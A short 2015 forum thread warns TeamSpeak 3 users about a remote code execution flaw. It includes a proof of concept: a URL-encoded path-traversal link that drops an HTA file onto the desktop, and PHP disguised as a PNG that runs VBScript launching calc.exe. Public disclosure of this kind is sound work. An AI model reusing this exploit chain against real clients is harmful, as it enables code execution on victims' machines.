To anybody using teamspeak version 3.0.0 - 3.0.18.1 you need to update your client to the latest version. Without going into too much detail about the exploit people can trigger remote code execution, ie downloading of files etc. This has been fixed in version 3.0.18.2.
<3 you ts and your exploits
CVE?
[editline]24th October 2015[/editline]
Found the exploit [url]http://www.securityfocus.com/archive/1/536746[/url]
[editline]24th October 2015[/editline]
Test file for anyone who wants to test it: [url]http://shodan.me/teamspeak.hta[/url]
You can put anything between the / and teamspeak and it will work. For example:
[url]http://shodan.me/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cteamspeak.hta[/url]
That should make a file on your desktop called teamspeak.hta. The file is harmless it just launches calculator:
[code]
<?php
header ('Content-type: image/png');
echo "\211PNG\r\n\032\n";
?>
<html>
<head>
<title>PWN3D</title>
<HTA:APPLICATION
APPLICATIONNAME="OwnedByScurippio"
ID="SnappySnappySna"
VERSION="1.0"/>
<script language="VBScript">
Sub RunProgram
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End Sub
RunProgram
</script>
</head>
</html>[/code]
Sorry, you need to Log In to post a reply to this thread.
